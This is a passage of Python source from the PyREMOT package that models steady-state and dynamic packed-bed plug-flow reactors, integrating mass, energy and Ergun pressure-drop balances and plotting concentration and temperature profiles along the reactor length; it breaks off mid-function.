from PyREMOT.docs.rmtReaction import reactionRateExe, componentFormationRate
from PyREMOT.docs.gasTransPor import calTest
# library
from PyREMOT.library.plot import plotClass as pltc
# data
from PyREMOT.data.inputDataReactor import *
# core
from PyREMOT.core.errors import errGeneralClass as errGeneral
from PyREMOT.core import constants as CONST
from PyREMOT.core.utilities import roundNum, selectFromListByIndex
from PyREMOT.core.config import REACTION_RATE_ACCURACY
# solvers
from PyREMOT.solvers.solSetting import solverSetting
from PyREMOT.core.eqConstants import CONST_EQ_Sh
from PyREMOT.solvers.solOrCo import OrCoClass
from PyREMOT.solvers.solCatParticle import OrCoCatParticleClass
from PyREMOT.solvers.solFiDi import FiDiBuildCMatrix, FiDiBuildTMatrix, FiDiSetMatrix, FiDiBuildCMatrix_DiLe, FiDiBuildTMatrix_DiLe
from PyREMOT.solvers.solFiDi import FiDiMeshGenerator, FiDiDerivative1, FiDiDerivative2, FiDiNonUniformDerivative1, FiDiNonUniformDerivative2
from PyREMOT.solvers.odeSolver import AdBash3, PreCorr3
from PyREMOT.solvers.solResultAnalysis import setOptimizeRootMethod, sortedResult3
class PackedBedReactorClass:
# def main():
"""
Packed-bed Reactor Model
M1 model: packed-bed plug-flow model (1D model)
assumptions:
homogeneous
no dispersion/diffusion along the reactor length
no radial variation of concentration and temperature
mass balance is based on flux
ergun equation is used for pressure drop
neglecting gravitational effects, kinetic energy, and viscosity change
M2 model: dynamic homogenous modeling
M3 model: steady-state homogenous modeling
"""
# internal data
_internalData = []
def __init__(self, modelInput, internalData, reactionListSorted, reactionStochCoeffList):
self.modelInput = modelInput
self.internalData = internalData
self.reactionListSorted = reactionListSorted
self.reactionStochCoeffList = reactionStochCoeffList
# @property
# def internalData(cls):
# return cls._internalData
# @internalData.setter
# def internalData(cls, value):
# cls._internalData.clear()
# cls._internalData.extend(value)
def runM10(self):
"""
M1 modeling case
"""
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# ->
modelParameters = {
"pressure": P,
"temperature": T
}
# component list
compList = self.modelInput['feed']['components']['shell']
labelList = compList.copy()
labelList.append("Flux")
# initial values
# -> mole fraction
MoFri = self.modelInput['feed']['mole-fraction']
# -> flux [kmol/m^2.s]
MoFl = self.modelInput['feed']['molar-flux']
IV = []
IV.extend(MoFri)
IV.append(MoFl)
# print(f"IV: {IV}")
# time span
# t = (0.0, rea_L)
t = np.array([0, rea_L])
times = np.linspace(t[0], t[1], 20)
# tSpan = np.linspace(0, rea_L, 25)
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM1,
t, IV, method="LSODA", t_eval=times, args=(P, T))
# ode result
successStatus = sol.success
dataX = sol.t
dataYs = sol.y
# check
if successStatus is True:
# plot setting
XYList = pltc.plots2DSetXYList(dataX, dataYs)
# -> label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# plot result
pltc.plots2D(dataList, "Reactor Length (m)",
"Concentration (mol/m^3)", "1D Plug-Flow Reactor")
else:
XYList = []
dataList = []
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
# NOTE
# steady-state homogeneous modeling
def runM1(self):
"""
M1 modeling case
steady-state modeling of plug-flow reactor
unknowns: Fi,F*,T,P
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Flux")
labelList.append("Temperature")
labelList.append("Pressure")
# component no
compNo = len(compList)
indexFlux = compNo
indexTemp = indexFlux + 1
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed porosity (bed void fraction)
BeVoFr = ReSpec['BeVoFr']
# mole fraction
MoFri = np.array(self.modelInput['feed']['mole-fraction'])
# flowrate [mol/s]
MoFlRa = self.modelInput['feed']['molar-flowrate']
# component flowrate [mol/s]
MoFlRai = MoFlRa*MoFri
# flux [mol/m^2.s]
MoFl = MoFlRa/(CrSeAr)
# component flux [mol/m^2.s]
MoFli = MoFl*MoFri
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = 4/ReInDi # ExHe['EfHeTrAr']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# var no (Fi,FT,T,P)
varNo = compNo + 3
# initial values
IV = np.zeros(varNo)
IV[0:compNo] = MoFlRai
IV[indexFlux] = MoFl
IV[indexTemp] = T
IV[indexPressure] = P
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi
},
"ReSpec": ReSpec,
"ExHe": {
"OvHeTrCo": U,
"EfHeTrAr": a,
"MeTe": Tm
},
"reactionRateExpr": reactionRateExpr
}
# save data
timesNo = solverSetting['S3']['timesNo']
# time span
# t = (0.0, rea_L)
t = np.array([0, ReLe])
t_span = np.array([0, ReLe])
times = np.linspace(t_span[0], t_span[1], timesNo)
# tSpan = np.linspace(0, rea_L, 25)
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# ode solver call
sol = solve_ivp(PackedBedReactorClass.modelEquationM1,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
dataX = sol.t
# all results
dataYs = sol.y
# molar flowrate [mol/s]
dataYs1 = sol.y[0:compNo, :]
labelListYs1 = labelList[0:compNo]
# REVIEW
# convert molar flowrate [mol/s] to mole fraction
dataYs1_Ftot = np.sum(dataYs1, axis=0)
dataYs1_MoFri = dataYs1/dataYs1_Ftot
# flux
dataYs2 = sol.y[indexFlux, :]
labelListYs2 = labelList[indexFlux]
# temperature
dataYs3 = sol.y[indexTemp, :]
labelListYs3 = labelList[indexTemp]
# pressure
dataYs4 = sol.y[indexPressure, :]
# FIXME
# build matrix
_dataYs = np.concatenate(
(dataYs1_MoFri, [dataYs2], [dataYs3], [dataYs4]), axis=0)
# steady-state results [mole fraction, temperature]
_ssdataYs = np.concatenate(
(dataYs1_MoFri, [dataYs3]), axis=0)
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State Modeling [M1] with timesNo: {timesNo} within {elapsed} seconds"
# check
if successStatus is True:
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataX, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexFlux], dataList[indexTemp], dataList[indexPressure]]
# select datalist
_dataListsSelected = selectFromListByIndex([0, -2], dataLists)
# subplot result
pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# plot result
# pltc.plots2D(dataList[0:compNo], "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexFlux], "Reactor Length (m)",
# "Flux (kmol/m^2.s)", "1D Plug-Flow Reactor")
# pltc.plots2D(dataList[indexTemp], "Reactor Length (m)",
# "Temperature (K)", "1D Plug-Flow Reactor")
else:
# error
print(f"Final result: {successStatus}")
_dataYs = []
XYList = []
dataList = []
# return
res = {
"dataYs": _ssdataYs,
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM1(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M1 model
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expression
PARAMS, VARS, RATES
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# bed porosity (bed void fraction)
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexFlux = compNo
indexT = indexFlux + 1
indexP = indexT + 1
# molar flowrate list [mol/s]
MoFlRai = y[0:compNo]
# total molar flux [mol/m^2.s]
MoFl = y[indexFlux]
# temperature [K]
T = y[indexT]
# pressure [Pa]
P = y[indexP]
# total molar flowrate [mol/s]
MoFlRa = np.sum(MoFlRai)
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai)
# concentration species [mol/m^3]
CoSpi = calConcentrationIG(MoFlRai, VoFlRai)
# total concentration [mol/m^3]
CoSp = np.sum(CoSpi)
# mole fraction
MoFri = rmtUtil.moleFractionFromConcentrationSpecies(CoSpi)
# MoFri2 = rmtUtil.moleFractionFromConcentrationSpecies(MoFlRai)
# interstitial gas velocity [m/s]
InGaVe = rmtUtil.calSuperficialGasVelocityFromEOS(MoFl, P, T)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# NOTE
# kinetics
# component formation rate [mol/m^3.s]
# conversion
# FIXME
# Ri2 = 1000*np.array(PackedBedReactorClass.modelReactions(
# P, T, MoFri, CaBeDe))
# loop
loopVars0 = (T, P, MoFri, CoSpi)
# component formation rate [mol/m^3.s]
# check unit
RiLoop = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
Ri = np.copy(RiLoop)
# component formation rate [mol/m^3.s]
# rf[mol/kgcat.s]*CaBeDe[kgcat/m^3]
# ri = np.zeros(compNo)
# for k in range(compNo):
# # reset
# _riLoop = 0
# for m in range(len(reactionStochCoeff)):
# for n in range(len(reactionStochCoeff[m])):
# if comList[k] == reactionStochCoeff[m][n][0]:
# _riLoop += reactionStochCoeff[m][n][1]*Ri[m]
# ri[k] = _riLoop
# call [mol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri)
# overall formation rate [mol/m^3.s]
OvR = np.sum(ri)
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [J/m^3.s]
OvHeReT = np.dot(Ri, HeReT)
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [J/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'J/m^3.s')
# diff/dt
dxdt = []
# loop vars
# FIXME
# const_F1 = 1/(CrSeAr*BeVoFr)
const_F1 = 1/(CrSeAr)
const_T1 = MoFl*CpMeanMixture
const_T2 = MoFlRa*CpMeanMixture/CrSeAr
# mass balance (molar flowrate) [mol/s]
for i in range(compNo):
dxdt_F = (1/const_F1)*ri[i]
dxdt.append(dxdt_F)
# flux
dxdt_Fl = OvR
dxdt.append(dxdt_Fl)
# energy balance (temperature) [K]
dxdt_T = (1/const_T1)*(-OvHeReT + Qm)
dxdt.append(dxdt_T)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
dxdt.append(dxdt_P)
return dxdt
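# NOTE
# editorial recap of the steady-state balances integrated by modelEquationM1
# along z (no new logic, just the equations as implemented above):
#   dFi/dz   = CrSeAr*ri[i]                    component molar flowrate [mol/s]
#   dMoFl/dz = OvR                             total molar flux [mol/m^2.s]
#   dT/dz    = (-OvHeReT + Qm)/(MoFl*Cp_mix)   energy balance [K/m]
#   dP/dz    = RHS_ergun                       Ergun momentum balance [Pa/m]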
# NOTE
# dynamic homogeneous modeling
def runM2(self):
"""
M2 modeling case
dynamic model
unknowns: Ci, T (dynamic), P (static)
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# total var no along the reactor length
varNoT = varNo*zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (varNo, zNo)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for i in range(compNo):
for j in range(zNo):
IV2D[i][j] = SpCoi0[i]
for j in range(zNo):
IV2D[indexTemp][j] = T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"zNo": zNo,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
"dz": dz
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"reactionRateExpr": reactionRateExpr,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T
}
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
sol = solve_ivp(PackedBedReactorClass.modelEquationM2,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise RuntimeError("ODE integration failed in runM2")
# time interval
dataTime = sol.t
# all results
dataYs = sol.y
# component concentration [mol/m^3]
dataYs1 = dataYs[0:varNoCon, -1]
# 2d matrix
dataYs1_Reshaped = np.reshape(dataYs1, (compNo, zNo))
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1_Reshaped, axis=0)
dataYs1_MoFri = dataYs1_Reshaped/dataYs1_Ctot
# temperature - 2d matrix
dataYs2 = np.array([dataYs[varNoCon:varNoT, -1]])
# combine
_dataYs = np.concatenate((dataYs1_MoFri, dataYs2), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCons": dataYs1_Reshaped,
"dataYTemp": dataYs2,
"dataYs": _dataYs
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling [M2] for opT: {opT} with zNo: {zNo}, tNo: {tNo}"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
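# NOTE
# editorial recap of the M2 time loop above (no new logic): the operating
# period opT is split into tNo sub-intervals, each integrated with solve_ivp;
# the final state of one interval (IV = dataYs[:, -1]) seeds the next, and
# dataPacktime stores one spatial profile per variable per time step.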
def modelEquationM2(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M2 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
zNo: number of finite difference in the z direction
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
dz: differential length [m]
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
reactionRateExpr: reaction rate expression
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# dz [m]
dz = const['dz']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# zNo
zNo = const['zNo']
# var no.
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# calculate
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity along z [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate
Ri_z = np.zeros((zNo, reactionListNo))
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
# species concentration [kmol/m^3]
CoSpi = np.zeros(compNo)
# reaction rate
ri = np.zeros(compNo)
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (varNo, zNo))
# -> concentration [mol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
for i in range(compNo):
_SpCoi = yLoop[i, :]
SpCoi_z[i, :] = _SpCoi
# temperature [K]
T_z = np.zeros(zNo)
T_z = yLoop[indexT, :]
# diff/dt
# dxdt = []
# matrix
dxdtMat = np.zeros((varNo, zNo))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(zNo):
## block ##
# FIXME
# concentration species [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# temperature [K]
T = T_z[z]
# pressure [Pa]
P = P_z[z]
## calculate ##
# mole fraction
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# gas velocity based on interstitial velocity [m/s]
InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
SuGaVe = InGaVe*BeVoFr
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# NOTE
# REVIEW
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaBeDe[kgcat/m^3]
# SpCoi conversion
_SpCoi = 1e3*CoSpi
# loop
loopVars0 = (T, P, MoFri, _SpCoi)
# check unit
RiLoop = 1e-3*np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
Ri_z[z, :] = RiLoop
# REVIEW
# component formation rate [kmol/m^3.s]
ri = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_z[z, :])
# overall formation rate [kmol/m^3.s]
OvR = np.sum(ri)
# NOTE
# enthalpy
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
CpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# print(f"Cp mean list: {CpMeanList}")
# Cp mixture
CpMeanMixture = calMixtureHeatCapacityAtConstantPressure(
MoFri, CpMeanList)
# print(f"Cp mean mixture: {CpMeanMixture}")
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, T))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT = np.dot(Ri_z[z, :], HeReT)
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m2/m3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
const_T1 = MoFl*CpMeanMixture
const_T2 = 1/(CoSp*CpMeanMixture*BeVoFr + (1-BeVoFr)*CaDe*CaSpHeCa)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
Ci_b = SpCoi0[i]
else:
